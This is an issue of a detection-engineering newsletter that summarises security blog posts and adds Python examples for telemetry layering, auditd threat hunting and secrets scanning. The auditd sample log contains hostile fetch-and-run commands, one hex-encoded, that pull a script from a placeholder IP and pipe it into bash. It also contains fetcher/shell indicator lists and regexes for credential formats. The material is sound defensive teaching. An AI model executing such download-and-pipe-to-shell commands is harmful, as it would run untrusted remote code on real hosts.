Detection Engineering Weekly #11 - Democratizing Detection and OPSEC Fails
Last week's news and how-tos in the art and science of Detection Engineering
Welcome to Issue 11 of Detection Engineering Weekly!
This week’s recap:
A 💎 from Palantir on crowdsourcing security
Layering telemetry to increase efficacy, Linux threat detection, Flipper Zero detection opportunities
The largest DDoS ever recorded (this week)
If you haven’t subscribed, please consider! I’ll do all the hard work of aggregating and writing, so you don’t have to :)
Happy Hunting
Explain Detection Engineering to your CEO: Feature #4 - Alec Randazzo
Social links: LinkedIn
Is it just me, or is everyone much better at describing detection engineering to this hypothetical CEO? I like Alec’s description of a detection engineering program as a hedge against control failures. As the threat landscape changes daily, so do our controls, so adapting and creating forward-looking and future-proof threat detection is key to reducing the impact of any control failures. Well put, Alec!
💎 Detection Engineering Gem 💎
Democratizing Security Detection by Palantir
This gem, in my opinion, shows where security needs to go to scale without first closing the "skills gap" we talk so much about. All security teams are outnumbered. By turning the rest of the organization into sensors, whether that means an employee denying an unexpected MFA prompt raises an alert, or clear instructions on reporting odd password reset prompts to the security team, you can get a lot of detection mileage out of your "normal" employees.
State of the Art
Adversary emulation on AWS with Stratus Red Team and Wazuh by Pacome Kemkeu
Amazing writeup on setting up an adversary emulation lab using the open-source SIEM Wazuh and Stratus Red Team, which emulates attacker techniques against AWS. Full disclosure: Stratus was built by the good folks here at Datadog, so I am a bit biased, but it is great to see an open-source tool reach "escape velocity" of usefulness through integrations with other tools.
Telemetry Layering by Jonathan Johnson
Telemetry layering is the practice of building a detection for a given technique on top of several independent telemetry sources rather than one. For example, if you want to catch an adversary loading a .NET assembly, how many distinct event traces could surface that operation? And what if the adversary knows which source you rely on and patches it so it stops logging? By layering sources, the detection still fires when one or more of them fail.
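As an added example (not code from Jonathan's post), here is what a two-layer version of that .NET detection might look like in Python. The constructed events stand in for Sysmon process-creation and image-load records and for the Microsoft-Windows-DotNETRuntime ETW provider's AssemblyLoad events; the event shapes, the pids and the EXPECTED_HOSTS allowlist are assumptions for this illustration.

```python
"""Telemetry layering: one detection ("a .NET runtime was loaded into a
process that does not normally host it") fed by two independent telemetry
sources, so that blinding one source does not blind the detection."""
from collections import defaultdict

# Constructed sample events, not real logs. Three event kinds:
#   - Sysmon Event ID 1 (ProcessCreate): maps pid -> image path
#   - Sysmon Event ID 7 (ImageLoaded): a DLL was loaded into pid
#   - ETW Microsoft-Windows-DotNETRuntime AssemblyLoad: the CLR loaded an assembly
# pid 4242 appears only in ETW, as if Sysmon image-load logging had been
# disabled or patched by the adversary.
SAMPLE_EVENTS = [
    {"source": "sysmon", "event_id": 1, "pid": 1337, "image": r"C:\Windows\System32\rundll32.exe"},
    {"source": "sysmon", "event_id": 1, "pid": 2001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"source": "sysmon", "event_id": 1, "pid": 4242, "image": r"C:\Windows\System32\notepad.exe"},
    {"source": "sysmon", "event_id": 7, "pid": 1337,
     "image_loaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"source": "etw", "provider": "Microsoft-Windows-DotNETRuntime", "event": "AssemblyLoad",
     "pid": 1337, "assembly": "SharpHound, Version=1.0.0.0, Culture=neutral"},
    {"source": "sysmon", "event_id": 7, "pid": 2001,
     "image_loaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"source": "etw", "provider": "Microsoft-Windows-DotNETRuntime", "event": "AssemblyLoad",
     "pid": 2001, "assembly": "System.Management.Automation, Version=3.0.0.0"},
    {"source": "etw", "provider": "Microsoft-Windows-DotNETRuntime", "event": "AssemblyLoad",
     "pid": 4242, "assembly": "Seatbelt, Version=1.0.0.0, Culture=neutral"},
]

# DLLs whose load means "the CLR is now in this process".
CLR_IMAGES = ("clr.dll", "coreclr.dll", "mscorwks.dll")
# Processes expected to host the CLR; an assumption, tune per environment.
EXPECTED_HOSTS = {"powershell.exe", "pwsh.exe", "devenv.exe", "msbuild.exe"}


def process_images(events):
    """Layer 0: pid -> lower-cased image basename from Sysmon process creation."""
    return {ev["pid"]: ev["image"].rsplit("\\", 1)[-1].lower()
            for ev in events if ev["source"] == "sysmon" and ev["event_id"] == 1}


def clr_loads(events):
    """pid -> set of telemetry layers that saw the CLR come up in that pid."""
    seen = defaultdict(set)
    for ev in events:
        if (ev["source"] == "sysmon" and ev["event_id"] == 7
                and ev["image_loaded"].lower().endswith(CLR_IMAGES)):
            seen[ev["pid"]].add("sysmon")
        elif ev["source"] == "etw" and ev.get("event") == "AssemblyLoad":
            seen[ev["pid"]].add("etw")
    return dict(seen)


def detect(events):
    """Alert on CLR loads in unexpected hosts. Each alert records which layers
    fired; a single-layer alert is itself worth a look, because it can mean
    the other source was tampered with."""
    images = process_images(events)
    alerts = []
    for pid, sources in sorted(clr_loads(events).items()):
        image = images.get(pid, "<unknown>")
        if image not in EXPECTED_HOSTS:
            alerts.append({"pid": pid, "image": image, "sources": sorted(sources),
                           "single_layer": len(sources) == 1})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run against the sample, the rundll32 process is caught by both layers, the PowerShell process is suppressed by the allowlist, and the Notepad process is caught by ETW alone; that last "single_layer" flag is the signal that the Sysmon layer may have been blinded and deserves its own alert.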
Fantastic IIS Modules and How to Find Them by Splunk Threat Research Team
I've been jumping up and down in joy with all the research being done on web server modules! Great post by the Threat Research team at Splunk on using Atomic Red Team to emulate module loading on IIS servers, with detection opportunities to catch these nasty buggers in real time. The "common paths" tuning parameter is a great nugget of detection logic that should significantly increase fidelity.
Establishing a Detection Engineering Program from the ground-up by Sohan G
Interesting survey of many threat detection and engineering resources stuffed into one blog post. The author also showcases their "Blue Team Funnel," which is inspired by the funnel of fidelity. They also overlay roles and frameworks over their funnel to show areas of responsibility based on what stage in the funnel you are in.
Finding Flipper Zero by Jim @ Grumpy Goose Labs
Cool to see some detection opportunities surrounding Flipper Zero! I've had a lot of fun with mine, mostly for stunt hacking, but I know it can be an effective tool for BadUSB attacks. It looks like the Flipper devs did not do the greatest job masking its USB identifiers, even when the Flipper is configured to masquerade as a normal USB device.
Bypassing MFA: A Forensic Look At Evilginx2 Phishing Kit by Carly Battaile
Evilginx2 is a man-in-the-middle phishing server that proxies the real login page and captures the resulting session, which lets an attacker bypass 2FA. It is "only meant for use in demonstration and educational purposes," and it is definitely not used only for demonstration and educational purposes. Luckily, researchers like Battaile exist to write up the attack flow of a 2FA-bypass phishing campaign and highlight detection opportunities along the way!
Linux auditd for Threat Hunting Part 1 by IzyKnows
Part 1 of a two-part series on writing Linux audit rules for threat hunting. I think the author confused hunting with detection (their slug has detection). Still, a great introduction to performing threat detection using out-of-the-box capabilities on Linux.
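As an added example, not code from the post, here is a small Python script that reassembles auditd execve records into one event per execution and then runs a few hunting queries over them. The log lines are constructed; the execve audit rule they assume, the indicator lists and the temp-directory prefixes are assumptions for this illustration.

```python
"""Hunting over raw auditd output: stitch the SYSCALL and EXECVE records that
share one audit serial back into a single execution event, then run hunting
queries over the reconstructed events."""
import re
from collections import defaultdict

# Constructed sample records in auditd's raw format (not from a real host).
# They assume an execve rule such as: -a always,exit -F arch=b64 -S execve -k exec
# auditd quotes plain strings and hex-encodes values containing spaces or
# control characters (see a2 of serial 5003); auid=4294967295 means "no login uid".
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1676400001.101:5001): arch=c000003e syscall=59 success=yes exit=0 ppid=1401 pid=1402 auid=1000 uid=1000 gid=1000 euid=1000 comm="curl" exe="/usr/bin/curl" key="exec"
type=EXECVE msg=audit(1676400001.101:5001): argc=3 a0="curl" a1="-fsSL" a2="http://198.51.100.23/setup.sh"
type=SYSCALL msg=audit(1676400002.220:5002): arch=c000003e syscall=59 success=yes exit=0 ppid=1401 pid=1403 auid=1000 uid=1000 gid=1000 euid=1000 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1676400002.220:5002): argc=2 a0="ls" a1="-la"
type=SYSCALL msg=audit(1676400003.330:5003): arch=c000003e syscall=59 success=yes exit=0 ppid=1401 pid=1404 auid=1000 uid=0 gid=0 euid=0 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1676400003.330:5003): argc=3 a0="bash" a1="-c" a2=6375726C202D7320687474703A2F2F3139382E35312E3130302E32332F70207C2062617368
type=CWD msg=audit(1676400003.330:5003): cwd="/home/alice"
type=SYSCALL msg=audit(1676400004.440:5004): arch=c000003e syscall=59 success=yes exit=0 ppid=1404 pid=1405 auid=1000 uid=0 gid=0 euid=0 comm="agent" exe="/tmp/.x/agent" key="exec"
type=EXECVE msg=audit(1676400004.440:5004): argc=1 a0="/tmp/.x/agent"
"""

MSG_RE = re.compile(r"msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\)")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Hunting indicators; assumptions for this example, extend as needed.
FETCHERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh", "python", "python3", "perl"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
AUID_UNSET = 4294967295


def _decode(value):
    """Turn a quoted or hex-encoded auditd value back into text."""
    if value.startswith('"') and value.endswith('"'):
        return value[1:-1]
    if re.fullmatch(r"[0-9A-Fa-f]+", value) and len(value) % 2 == 0:
        return bytes.fromhex(value).decode("utf-8", "replace")
    return value


def parse_audit_log(text):
    """Group records by audit serial and emit one dict per execve with
    serial, ts, exe, comm, pid, ppid, uid, auid and the decoded argv."""
    by_serial = defaultdict(dict)
    for line in text.splitlines():
        m = MSG_RE.search(line)
        if not m:
            continue
        fields = dict(FIELD_RE.findall(line))
        rec = by_serial[m["serial"]]
        rec["ts"] = float(m["ts"])
        if fields["type"] == "SYSCALL":
            for k in ("exe", "comm"):
                rec[k] = _decode(fields.get(k, '""'))
            for k in ("pid", "ppid", "uid", "auid"):
                rec[k] = int(fields[k])
        elif fields["type"] == "EXECVE":
            # Only a<n> fields are hex-decoded; pid-style numbers are never hex.
            rec["argv"] = [_decode(fields[f"a{i}"]) for i in range(int(fields["argc"]))]
        # Other record types (CWD, PATH, PROCTITLE) are ignored here.
    return [dict(serial=s, **r) for s, r in by_serial.items()
            if "argv" in r and "exe" in r]


def hunt(execs):
    """Three simple hunts: fetch-and-pipe-to-shell, execution from a temp
    directory, and root execution attributed to a real (non-root) login uid."""
    findings = []
    for e in execs:
        cmdline = " ".join(e["argv"])
        reasons = []
        if "|" in cmdline:
            left, right = cmdline.rsplit("|", 1)
            tokens = right.split()
            if FETCHERS & set(left.split()) and tokens and tokens[0] in SHELLS:
                reasons.append("remote fetch piped into a shell")
        if e["exe"].startswith(TEMP_DIRS):
            reasons.append("executable run from a temp directory")
        if e["uid"] == 0 and e["auid"] not in (0, AUID_UNSET):
            reasons.append(f"root exec by login uid {e['auid']}")
        if reasons:
            findings.append({"serial": e["serial"], "exe": e["exe"],
                             "cmdline": cmdline, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(parse_audit_log(SAMPLE_AUDIT_LOG)):
        print(f)
```

The point of carrying auid alongside uid is that auditd's login uid survives sudo and su, so "root ran something, but the session belongs to uid 1000" is a question you can only ask with audit data, not with plain process listings.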
EP108 How to Hunt the Cloud: Lessons and Experiences from Years of Threat Hunting by Cloud Security Podcast
If you want a zero-to-hero podcast on truly understanding threat hunting and what it is NOT, this podcast is for you! John Stoner does a great job answering questions by the Cloud Security Podcast hosts on how hunting can influence threat detection.
Threat Landscape
Collect, Exfiltrate, Sleep, Repeat by The DFIR Report
Interesting DFIR analysis of an incident that used AutoHotKey for keylogging. It was nice to see some semblance of the past, with a malicious VBA macro being executed for initial access instead of OneNote files!
New ESXiArgs ransomware version prevents VMware ESXi recovery by Lawrence Abrams
After the initial ESXiArgs ransomware snafu, where the encryptor only hit the config files and left the virtual disks recoverable, the actors fixed their operation and targeted the virtual machine files themselves. Here's the weird part: they still did not encrypt the files in full and instead used a step counter to encrypt 1 MB at a time.
Evasion Techniques Uncovered: An Analysis of APT Methods by Christiaan Beek
TIL what MOTW means. Mark-of-the-Web is the Zone.Identifier metadata Windows attaches to a file downloaded from the internet, and the evasion takes advantage of the fact that when a downloaded container file (such as a VHD or ISO) is mounted, the files inside it do not carry the same mark, letting them bypass trust controls that key off it. Beek describes this technique as used by the PlugX malware that Rapid7 observed in the wild in January.
CISA Adds Three Known Exploited Vulnerabilities to Catalog by CISA
Not three, make that seven new vulnerabilities in the last four days. If you don't track this list as part of your detection backlog, I highly recommend bookmarking it. The latest seven span Microsoft, Apple (iPhone), and Intel products.
Cloudflare mitigates record-breaking 71 million request-per-second DDoS attack by Omer Yoachimik, Julien Desgats and Alex Forster
Have you heard of volumetric DDoS attacks? How about HYPER volumetric attacks? Well, Cloudflare has, and they apparently stopped dozens of them over the weekend. I really like following these anti-DDoS provider blogs because you can see that they are subtly one-upping each other by finding an even bigger attack than others. Nice work, Cloudflare!
Havoc Across the Cyberspace by Niraj Shivtarkar and Shatak Jain
Havoc C2, an open-source C2 framework, was found being used in the wild by the team at Zscaler ThreatLabz. The best part of this blog is the OPSEC blunders made by the actor. Apparently, the C2 domain hosted an open-directory web server containing screenshots of the actor using Metasploit and captures of their own desktop.
Open Source
Guarddog 1.0 by Datadog Security Labs
Full disclosure: I work at Datadog. Shameless plug: I don't care, as I'm super excited about this release. You've seen me post a few stories surrounding malware in PyPI; well, Guarddog 1.0 now scans npm packages for malware too! And guess what? It's free!
Detections by Delivr-To
I haven't seen any open-source rules for Sublime's product; maybe I haven't looked hard enough! Delivr-To's team has published rules here for catching malicious attachments and brand impersonation.
Secrets Patterns Database by mazen160
Recently created repo with over 1,600 regular expressions mapped to the secret formats found in all kinds of applications: API keys, passwords, and tokens.
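As an added illustration (not code from the repo), here is a minimal Python scanner of the kind that would consume such a pattern database. It uses a handful of constructed patterns rather than the repo's own, and adds a Shannon-entropy check so generic "password =" matches on placeholders are dropped; the patterns, the entropy threshold and the sample config are assumptions for this example.

```python
"""Scanning text for leaked secrets with a regex pattern database, plus an
entropy check to cut false positives from the generic patterns."""
import math
import re

# Constructed patterns for illustration only; a real scan would load the
# repository's database. Each entry: a name, a regex, and whether the matched
# value must also look high-entropy before it is reported.
PATTERNS = [
    {"name": "AWS access key ID", "regex": r"\bAKIA[0-9A-Z]{16}\b", "entropy_check": False},
    {"name": "GitHub personal access token", "regex": r"\bghp_[A-Za-z0-9]{36}\b",
     "entropy_check": False},
    {"name": "Private key block",
     "regex": r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----", "entropy_check": False},
    # No leading \b: keys are often snake_case like db_password, and "_" is a word char.
    {"name": "Generic password assignment",
     "regex": r"""(?i)(?:password|passwd|pwd|secret)\s*[:=]\s*['"]?(?P<value>[^'"\s]{8,})""",
     "entropy_check": True},
]
COMPILED = [(p["name"], re.compile(p["regex"]), p["entropy_check"]) for p in PATTERNS]
MIN_ENTROPY = 3.0  # bits per character; an assumed threshold, tune on your own data


def shannon_entropy(s):
    """Bits per character; 'password' scores 2.75, a random 24-char token ~4.6."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def redact(value):
    """Keep a recognisable prefix so findings can be triaged without re-leaking."""
    return value[:4] + "*" * (len(value) - 4)


def scan(text):
    """Return one finding per (line, pattern) hit: line number, type, redacted value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx, needs_entropy in COMPILED:
            for m in rx.finditer(line):
                value = m.group("value") if "value" in rx.groupindex else m.group(0)
                if needs_entropy and shannon_entropy(value) < MIN_ENTROPY:
                    continue  # placeholder such as "password = password"; skip it
                findings.append({"line": lineno, "type": name, "match": redact(value)})
    return findings


# Constructed sample config, not a real file. The AWS key is the documented
# example value from AWS's own docs.
SAMPLE_TEXT = """\
# constructed sample config, not a real file
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
db_password = password
api_secret = "Q7h2p9zR4kLm1xVb3nTs8wYe"
token = ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
-----BEGIN RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_TEXT):
        print(finding)
```

Specific-format patterns (a fixed prefix and length) can be reported as-is, which is why the entropy gate only applies to the generic assignment pattern; that is also where most of the noise from a 1,600-pattern database will come from, so keep the specific ones and gate the generic ones.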
Birdcage by Phylum
A Rust-based sandbox that installs packages from your favorite language's package manager in an isolated environment so you can see whether they are malicious. Phylum's CLI invokes Birdcage when interacting with these package managers and blocks the install if it finds something risky.
Tripwire — red|purple|blue team detection lab orchestration by hacksplaining
Tripwire is a self-contained detection lab environment. Projects like this are nice to have because, as the author explains, you can run your attacks, observe logs and telemetry, then create detections all in one single pane of glass.